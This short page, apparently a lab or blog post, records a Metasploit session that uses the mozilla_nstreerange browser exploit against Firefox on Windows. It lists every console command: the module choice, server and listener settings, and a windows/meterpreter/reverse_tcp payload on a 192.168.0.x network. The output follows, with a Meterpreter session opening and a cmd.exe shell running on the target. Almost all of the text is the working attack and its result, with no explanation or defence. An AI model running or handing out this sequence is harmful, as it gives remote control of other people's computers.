control – metasploit mozilla_nstreerange

use exploit/windows/browser/mozilla_nstreerange
set ssl version ssl3
set srvport 8101
set lport 4465
set ssl 0
set payload windows/meterpreter/reverse_tcp
set target 0
set srvhost 192.168.0.2
set lhost 192.168.0.2
set uripath /site
exploit -j

Meterpreter session 1 opened (192.168.0.2:4465 -> 192.168.0.20:49434)

sessions -i 1
execute -f cmd.exe -c
interact 1

Interacting with channel 1…

Microsoft Windows
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files\Mozilla Firefox>

Leave a comment